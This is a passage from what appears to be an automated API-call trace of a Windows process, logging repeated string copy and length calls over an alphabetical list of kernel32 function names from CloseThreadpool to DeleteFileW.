(lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.429] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.429] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.429] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.429] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.429] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.430] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.430] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.430] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.430] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.430] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.430] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.430] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.430] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.430] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.430] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.430] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.430] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.430] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.430] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.430] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.430] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.430] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.430] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.431] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.431] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.431] lstrlenA (lpString="COPYFILEA") returned 9 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.431] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.431] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.431] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.431] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.431] lstrlenA (lpString="COPYFILEW") returned 9 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.431] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.431] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.431] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.431] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.431] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.431] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.431] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.431] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.431] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.431] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.431] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.432] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.432] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.432] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.432] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.432] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.432] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.432] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.432] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.432] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.432] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.432] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.432] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.432] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.432] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.432] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.432] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.432] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.432] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.433] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.433] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.433] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.433] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.433] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.433] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.433] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.433] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.433] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.433] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.433] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.433] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.433] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.433] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.433] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.433] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.433] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.433] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.434] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.434] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.434] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.434] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.434] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.434] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.434] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.434] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.434] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.434] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.434] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.434] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.434] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.434] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.434] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.434] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.434] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.434] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.434] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.435] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.435] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.435] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.435] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.435] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.435] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.435] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.435] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.435] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.435] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.435] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.435] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.435] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.435] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.435] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.435] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.435] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.435] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.436] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.436] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.436] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.436] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.436] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.436] lstrlenA (lpString="DELETEATOM") returned 10 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.436] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.436] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.436] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.436] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.436] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.436] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.436] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.436] lstrcpyA (in: 